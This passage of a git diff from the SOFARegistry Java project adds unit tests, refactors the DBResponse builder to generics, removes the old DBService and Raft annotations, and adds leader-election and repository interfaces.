Assert.assertEquals(subDatum.getGroup(), subscriber.getGroup()); + Assert.assertEquals(subDatum.getVersion(), ValueConstants.DEFAULT_NO_DATUM_VERSION); + Assert.assertTrue(subDatum.getPublishers().isEmpty()); + } + + @Test + public void testIntern() { + Map m = Collections.singletonMap("test", DatumVersion.of(100)); + Assert.assertEquals(DatumUtils.intern(m), m); + } + + @Test + public void testDatum() { + Datum datum = new Datum(); + Publisher publisher = new Publisher(); + publisher.setRegisterId("testRegisterId"); + publisher.setCell("testCell"); + publisher.setDataList(Collections.emptyList()); + publisher.setVersion(100); + publisher.setRegisterTimestamp(System.currentTimeMillis()); + publisher.setPublishSource(PublishSource.CLIENT); + datum.addPublisher(publisher); + datum.setDataCenter("testDc"); + datum.setDataId("testDataId"); + datum.setVersion(200); + datum.setInstanceId("testInstanceId"); + datum.setGroup("testGroup"); + datum.setDataInfoId("testDataInfoId"); + SubDatum subDatum = DatumUtils.of(datum); + + Assert.assertEquals(subDatum.getDataCenter(), datum.getDataCenter()); + Assert.assertEquals(subDatum.getDataInfoId(), datum.getDataInfoId()); + Assert.assertEquals(subDatum.getDataId(), datum.getDataId()); + Assert.assertEquals(subDatum.getInstanceId(), datum.getInstanceId()); + Assert.assertEquals(subDatum.getGroup(), datum.getGroup()); + Assert.assertEquals(subDatum.getVersion(), datum.getVersion()); + + Publisher p = datum.getPubMap().get(publisher.getRegisterId()); + + Assert.assertEquals(p.getRegisterId(), publisher.getRegisterId()); + Assert.assertEquals(p.getCell(), publisher.getCell()); + Assert.assertEquals(p.getDataList(), publisher.getDataList()); + Assert.assertEquals(p.getVersion(), publisher.getVersion()); + Assert.assertEquals(p.getRegisterTimestamp(), publisher.getRegisterTimestamp()); + Assert.assertEquals(p.getPublishSource(), publisher.getPublishSource()); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/util/NodeUtilsTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/util/NodeUtilsTest.java new file mode 100644 index 000000000..26204865b --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/util/NodeUtilsTest.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.util; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.store.URL; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class NodeUtilsTest { + @Test + public void test() { + Assert.assertTrue(NodeUtils.transferNodeToIpList(Collections.EMPTY_LIST).isEmpty()); + SessionNode node1 = new SessionNode(new URL("xx", 12), "test", null); + SessionNode node2 = new SessionNode(new URL("yy", 34), "test", null); + List list = NodeUtils.transferNodeToIpList(Lists.newArrayList(node1, node2)); + Assert.assertEquals(list.get(0), "xx"); + Assert.assertEquals(list.get(1), "yy"); + } +} diff --git a/server/store/api/pom.xml b/server/store/api/pom.xml index ab28b3dd8..6e60dbebb 100644 --- a/server/store/api/pom.xml +++ b/server/store/api/pom.xml @@ -5,22 +5,41 @@ com.alipay.sofa registry-store - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 - registry-store-api + registry-store-common ../../../ + + com.alipay.sofa + registry-core + com.alipay.sofa registry-common-model + + junit + junit + test + + + org.springframework.boot + spring-boot-starter + + + org.springframework.boot + spring-boot-starter-logging + + + diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBResponse.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBResponse.java index 4c3bcb923..8ecc759fb 100644 --- a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBResponse.java +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBResponse.java @@ -16,145 +16,136 @@ */ package com.alipay.sofa.registry.store.api; +import com.alipay.sofa.registry.util.ParaCheckUtil; import java.io.Serializable; /** * DBResponse + * * @author shangyu.wh * @version $Id: DBResponse.java, v 0.1 2018-04-18 16:35 shangyu.wh Exp $ */ -public class DBResponse implements Serializable { - - private final Object entity; - - private final OperationStatus operationStatus; - - /** - * @param entity - * @param operationStatus - */ - public DBResponse(Object entity, OperationStatus operationStatus) { - this.entity = entity; - this.operationStatus = operationStatus; - } +public class DBResponse implements Serializable { + + private final T entity; + + private final OperationStatus operationStatus; + + /** + * @param entity + * @param operationStatus + */ + public DBResponse(T entity, OperationStatus operationStatus) { + this.entity = entity; + this.operationStatus = operationStatus; + } + + /** + * generate response ok + * + * @return + */ + public static DBResponseBuilder ok() { + return setStatus(OperationStatus.SUCCESS); + } + + /** + * generate response ok + * + * @param entity + * @return + */ + public static DBResponseBuilder ok(T entity) { + DBResponseBuilder b = ok(); + b.entity(entity); + return b; + } + + /** + * set operationStatus to NOTFOUND + * + * @return + */ + public static DBResponseBuilder notfound() { + return setStatus(OperationStatus.NOTFOUND); + } + + /** + * set operationStatus + * + * @param status + * @return + */ + protected static DBResponseBuilder setStatus(OperationStatus status) { + DBResponseBuilder b = DBResponseBuilder.getInstance(); + b.status(status); + return b; + } + + /** + * Getter method for property entity. + * + * @return property value of entity + */ + public T getEntity() { + return entity; + } + + /** + * Getter method for property operationStatus. + * + * @return property value of operationStatus + */ + public OperationStatus getOperationStatus() { + return operationStatus; + } + + /** DBResponseBuilder */ + public static class DBResponseBuilder { + private DBResponseBuilder() {} /** - * generate response ok + * get DBResponseBuilder instance + * * @return */ - public static DBResponseBuilder ok() { - return setStatus(OperationStatus.SUCCESS); + public static DBResponseBuilder getInstance() { + return new DBResponseBuilder(); } - /** - * generate response ok - * @param entity - * @return - */ - public static DBResponseBuilder ok(Object entity) { - DBResponseBuilder b = ok(); - b.entity(entity); - return b; - } + private T entity; - /** - * set operationStatus to NOTFOUND - * @return - */ - public static DBResponseBuilder notfound() { - return setStatus(OperationStatus.NOTFOUND); - } + private OperationStatus operationStatus; /** - * set operationStatus - * @param status + * build func + * * @return */ - protected static DBResponseBuilder setStatus(OperationStatus status) { - DBResponseBuilder b = DBResponseBuilder.getInstance(); - b.status(status); - return b; + public DBResponse build() { + return new DBResponse(entity, operationStatus); } - /** - * Getter method for property entity. + * set operationStatus status * - * @return property value of entity + * @param status + * @return */ - public Object getEntity() { - return entity; + public DBResponseBuilder status(OperationStatus status) { + ParaCheckUtil.checkNotNull(status, "OperationStatus"); + this.operationStatus = status; + return this; } /** - * Getter method for property operationStatus. + * set entity * - * @return property value of operationStatus - */ - public OperationStatus getOperationStatus() { - return operationStatus; - } - - /** - * DBResponseBuilder + * @param entity + * @return */ - public static class DBResponseBuilder { - private static volatile DBResponseBuilder instance; - - /** - * get DBResponseBuilder instance - * @return - */ - public static DBResponseBuilder getInstance() { - if (instance == null) { - synchronized (DBResponseBuilder.class) { - if (instance == null) { - instance = new DBResponseBuilder(); - } - } - } - return instance; - } - - private Object entity; - - private OperationStatus operationStatus; - - /** - * build func - * @return - */ - public DBResponse build() { - final DBResponse r = new DBResponse(entity, operationStatus); - reset(); - return r; - } - - private void reset() { - operationStatus = null; - entity = null; - } - - /** - * set operationStatus status - * @param status - * @return - */ - public DBResponseBuilder status(OperationStatus status) { - if (status == null) { - throw new IllegalArgumentException(); - } - this.operationStatus = status; - return this; - } - - /** - * set entity - * @param entity - * @return - */ - public DBResponseBuilder entity(Object entity) { - this.entity = entity; - return this; - } + public DBResponseBuilder entity(T entity) { + this.entity = entity; + return this; } -} \ No newline at end of file + } +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBService.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBService.java deleted file mode 100644 index fd27efbff..000000000 --- a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/DBService.java +++ /dev/null @@ -1,69 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.store.api; - -import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; - -/** - * - * @author shangyu.wh - * @version $Id: DBService.java, v 0.1 2018-04-18 12:06 shangyu.wh Exp $ - */ -public interface DBService { - - /** - * open db - * @param dbName - * @param entityClass - */ - void openDB(String dbName, Class entityClass); - - /** - * add - * @param key - * @param value - * @return - * @throws Exception - */ - boolean put(String key, Object value) throws Exception; - - /** - * get - * @param key - * @return - * @throws Exception - */ - @ReadOnLeader - DBResponse get(String key) throws Exception; - - /** - * update - * @param key - * @param value - * @return - * @throws Exception - */ - boolean update(String key, Object value) throws Exception; - - /** - * delete - * @param key - * @return - * @throws Exception - */ - boolean remove(String key) throws Exception; -} \ No newline at end of file diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/OperationStatus.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/OperationStatus.java index 4114059f9..0fffb9e76 100644 --- a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/OperationStatus.java +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/OperationStatus.java @@ -17,17 +17,13 @@ package com.alipay.sofa.registry.store.api; /** - @author xuanbei - @since 2019/2/12 + * @author xuanbei + * @since 2019/2/12 */ public enum OperationStatus { - /** - * The operation was successful. - */ - SUCCESS, + /** The operation was successful. */ + SUCCESS, - /** - * The requested key/data pair was not found. - */ - NOTFOUND + /** The requested key/data pair was not found. */ + NOTFOUND } diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/RaftReference.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/RaftReference.java deleted file mode 100644 index 48e0af5c9..000000000 --- a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/RaftReference.java +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.store.api.annotation; - -import java.lang.annotation.ElementType; -import java.lang.annotation.Retention; -import java.lang.annotation.RetentionPolicy; -import java.lang.annotation.Target; - -/** - * - * @author shangyu.wh - * @version $Id: RaftReference.java, v 0.1 2018-05-22 22:37 shangyu.wh Exp $ - */ -@Retention(RetentionPolicy.RUNTIME) -@Target(ElementType.FIELD) -public @interface RaftReference { - - Class interfaceType() default void.class; - - String uniqueId() default ""; -} \ No newline at end of file diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/RaftService.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/RaftService.java deleted file mode 100644 index f4e3565ab..000000000 --- a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/RaftService.java +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.store.api.annotation; - -import java.lang.annotation.ElementType; -import java.lang.annotation.Retention; -import java.lang.annotation.RetentionPolicy; -import java.lang.annotation.Target; - -/** - * - * @author shangyu.wh - * @version $Id: RaftService.java, v 0.1 2018-05-22 22:39 shangyu.wh Exp $ - */ -@Retention(RetentionPolicy.RUNTIME) -@Target(ElementType.TYPE) -public @interface RaftService { - - Class interfaceType() default void.class; - - String uniqueId() default ""; -} \ No newline at end of file diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/ReadOnLeader.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/ReadOnLeader.java index 5bd53e2f8..5b8b5f7be 100644 --- a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/ReadOnLeader.java +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/annotation/ReadOnLeader.java @@ -16,18 +16,16 @@ */ package com.alipay.sofa.registry.store.api.annotation; +import static java.lang.annotation.RetentionPolicy.RUNTIME; + import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.Target; -import static java.lang.annotation.RetentionPolicy.RUNTIME; - /** - * * @author shangyu.wh * @version $Id: ReadOnLeader.java, v 0.1 2018-05-29 22:25 shangyu.wh Exp $ */ -@Target({ ElementType.METHOD }) +@Target({ElementType.METHOD}) @Retention(RUNTIME) -public @interface ReadOnLeader { -} \ No newline at end of file +public @interface ReadOnLeader {} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/AbstractLeaderElector.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/AbstractLeaderElector.java new file mode 100644 index 000000000..34750d9fb --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/AbstractLeaderElector.java @@ -0,0 +1,244 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.elector; + +import com.alipay.sofa.common.profile.StringUtil; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import com.google.common.collect.Lists; +import java.util.Date; +import java.util.List; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; + +/** + * @author chen.zhu + *

Mar 10, 2021 + */ +public abstract class AbstractLeaderElector implements LeaderElector { + private static final Logger LOG = LoggerFactory.getLogger("META-ELECTOR"); + + private final List leaderAwares = Lists.newCopyOnWriteArrayList(); + + private volatile LeaderInfo leaderInfo = LeaderInfo.HAS_NO_LEADER; + + private volatile boolean startElector = false; + + private volatile boolean isObserver = false; + + private final LeaderElectorTrigger leaderElectorTrigger = new LeaderElectorTrigger(); + + @Override + public void registerLeaderAware(LeaderAware leaderAware) { + leaderAwares.add(leaderAware); + } + + @PostConstruct + public void init() { + ConcurrentUtils.createDaemonThread("LeaderElectorTrigger", leaderElectorTrigger).start(); + } + + private class LeaderElectorTrigger extends LoopRunnable { + + @Override + public void runUnthrowable() { + if (startElector) { + try { + elect(); + LOG.info("after elect, leader={}", leaderInfo); + } catch (Throwable e) { + LOG.error("failed to do elect", e); + } + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(1, TimeUnit.SECONDS); + } + } + + public void elect() { + synchronized (this) { + if (isObserver) { + leaderInfo = doQuery(); + } else { + leaderInfo = doElect(); + } + + if (amILeader()) { + onIamLeader(); + } else { + onIamNotLeader(); + } + } + } + + @Override + public String myself() { + return NetUtil.getLocalAddress().getHostAddress(); + } + /** + * start compete leader + * + * @return + */ + @Override + public synchronized void change2Follow() { + this.startElector = true; + this.isObserver = false; + } + + /** + * stop compete leader + * + * @return + */ + @Override + public synchronized void change2Observer() { + this.isObserver = true; + } + /** + * query leader + * + * @return + */ + protected abstract LeaderInfo doQuery(); + + /** + * elector leader + * + * @return + */ + protected abstract LeaderInfo doElect(); + + /** + * Am i elector boolean. + * + * @return the boolean + */ + @Override + public boolean amILeader() { + return amILeader(leaderInfo.leader); + } + + protected boolean amILeader(String leader) { + long current = System.currentTimeMillis(); + return StringUtil.equals(myself(), leader) && current < leaderInfo.expireTimestamp; + } + + /** + * Gets get elector. + * + * @return the get elector + */ + @Override + public String getLeader() { + return leaderInfo.leader; + } + + /** + * Gets get elector epoch. + * + * @return the get elector epoch + */ + @Override + public long getLeaderEpoch() { + return leaderInfo.epoch; + } + + /** notify when change to elector */ + private void onIamNotLeader() { + for (LeaderAware leaderAware : leaderAwares) { + leaderAware.followNotify(); + } + } + + /** notify when change to follow */ + private void onIamLeader() { + for (LeaderAware leaderAware : leaderAwares) { + leaderAware.leaderNotify(); + } + } + + protected static LeaderInfo calcLeaderInfo( + String leader, long epoch, Date lastHeartbeat, long duration) { + final long expireTimestamp = lastHeartbeat.getTime() + duration / 2; + return new LeaderInfo(epoch, leader, expireTimestamp); + } + + public static class LeaderInfo { + + private static final long INIT_EPOCH = -1L; + public static final LeaderInfo HAS_NO_LEADER = new LeaderInfo(INIT_EPOCH, null, 0); + + private final long epoch; + + private final String leader; + + private final long expireTimestamp; + + public LeaderInfo(long epoch, String leader, long expireTimestamp) { + this.leader = leader; + this.epoch = epoch; + this.expireTimestamp = expireTimestamp; + } + + /** + * Getter method for property epoch. + * + * @return property value of epoch + */ + public long getEpoch() { + return epoch; + } + + /** + * Getter method for property leader. + * + * @return property value of leader + */ + public String getLeader() { + return leader; + } + + /** + * Getter method for property expireTimestamp. + * + * @return property value of expireTimestamp + */ + public long getExpireTimestamp() { + return expireTimestamp; + } + + @Override + public String toString() { + return "LeaderInfo{" + + "epoch=" + + epoch + + ", leader='" + + leader + + '\'' + + ", expireTimestamp=" + + expireTimestamp + + '}'; + } + } +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/LeaderAware.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/LeaderAware.java new file mode 100644 index 000000000..833fadffd --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/LeaderAware.java @@ -0,0 +1,29 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.elector; + +/** + * @author chen.zhu + *

Nov 21, 2020 + */ +public interface LeaderAware { + /** notify listeners when I'm elector. */ + void leaderNotify(); + + /** notify listeners when I'm not elector. */ + void followNotify(); +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/LeaderElector.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/LeaderElector.java new file mode 100644 index 000000000..28739a9b6 --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/elector/LeaderElector.java @@ -0,0 +1,69 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.elector; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public interface LeaderElector { + + void registerLeaderAware(LeaderAware leaderAware); + + String myself(); + + /** + * start compete leader + * + * @return + */ + void change2Follow(); + + /** + * stop compete leader + * + * @return + */ + void change2Observer(); + + /** + * Am i elector boolean. + * + * @return the boolean + */ + boolean amILeader(); + + /** + * Gets get elector. + * + * @return the get elector + */ + String getLeader(); + + /** + * Gets get elector epoch. + * + * @return the get elector epoch + */ + long getLeaderEpoch(); + + enum ElectorRole { + LEADER, + FOLLOWER, + ; + } +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/meta/ProvideDataRepository.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/meta/ProvideDataRepository.java new file mode 100644 index 000000000..d1a243aeb --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/meta/ProvideDataRepository.java @@ -0,0 +1,58 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.meta; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import java.util.Collection; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public interface ProvideDataRepository { + + /** + * save or update provideData + * + * @param persistenceData + * @return + */ + boolean put(PersistenceData persistenceData, long expectVersion); + + /** + * query provideData by key + * + * @param key + * @return + */ + PersistenceData get(String key); + + /** + * delete provideData + * + * @param key + * @return + */ + boolean remove(String key, long version); + + /** + * query all provide data + * + * @return + */ + Collection getAll(); +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/AppRevisionHeartbeatRepository.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/AppRevisionHeartbeatRepository.java new file mode 100644 index 000000000..35316ea44 --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/AppRevisionHeartbeatRepository.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.repository; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionHeartbeatRepository.java, v 0.1 2021年02月09日 17:09 xiaojian.xj Exp $ + */ +public interface AppRevisionHeartbeatRepository { + + public void doAppRevisionHeartbeat(); + + public void doHeartbeatCacheChecker(); + + public void doAppRevisionGc(int silenceHour); +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/AppRevisionRepository.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/AppRevisionRepository.java new file mode 100644 index 000000000..04e466969 --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/AppRevisionRepository.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.repository; + +import com.alipay.sofa.registry.common.model.store.AppRevision; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionRepository.java, v 0.1 2021年01月17日 13:54 xiaojian.xj Exp $ + */ +public interface AppRevisionRepository { + + /** + * persistence appRevision + * + * @param appRevision + */ + public void register(AppRevision appRevision) throws Exception; + + /** refresh */ + public void refresh(); + + /** + * get AppRevision + * + * @param revision + * @return + */ + public AppRevision queryRevision(String revision); + + public boolean heartbeat(String revision); +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/InterfaceAppsRepository.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/InterfaceAppsRepository.java new file mode 100644 index 000000000..82ccb604b --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/repository/InterfaceAppsRepository.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.repository; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import java.util.Set; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppsRepository.java, v 0.1 2021年01月24日 19:33 xiaojian.xj Exp $ + */ +public interface InterfaceAppsRepository { + + /** + * get revisions by interfaceName + * + * @param dataInfoId + * @return return + */ + InterfaceMapping getAppNames(String dataInfoId); + /** + * insert + * + * @param appName + * @return + */ + default void batchSave(String appName, Set interfaceName) {} + + /** refresh when startup */ + void loadMetadata(); +} diff --git a/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/spring/SpringContext.java b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/spring/SpringContext.java new file mode 100644 index 000000000..6049b1f87 --- /dev/null +++ b/server/store/api/src/main/java/com/alipay/sofa/registry/store/api/spring/SpringContext.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api.spring; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public final class SpringContext { + + public static final String PERSISTENCE_PROFILE_ACTIVE = "persistence.profile.active"; + + public static final String META_STORE_API_JDBC = "jdbc"; + + public static final String META_STORE_API_RAFT = "raft"; + + public static final String META_SERVER_CLOUD_MODEL = "CLOUD"; +} diff --git a/server/store/api/src/test/java/com/alipay/sofa/registry/store/api/DBResponseTest.java b/server/store/api/src/test/java/com/alipay/sofa/registry/store/api/DBResponseTest.java new file mode 100644 index 000000000..9144953ca --- /dev/null +++ b/server/store/api/src/test/java/com/alipay/sofa/registry/store/api/DBResponseTest.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.store.api; + +import org.junit.Assert; +import org.junit.Test; + +public class DBResponseTest { + @Test + public void test() { + Object obj1 = new Object(); + DBResponse.DBResponseBuilder builder = DBResponse.ok(obj1); + Object obj2 = new Object(); + builder.entity(obj2); + DBResponse response = builder.build(); + Assert.assertEquals(response.getEntity(), obj2); + } +} diff --git a/server/store/jdbc/pom.xml 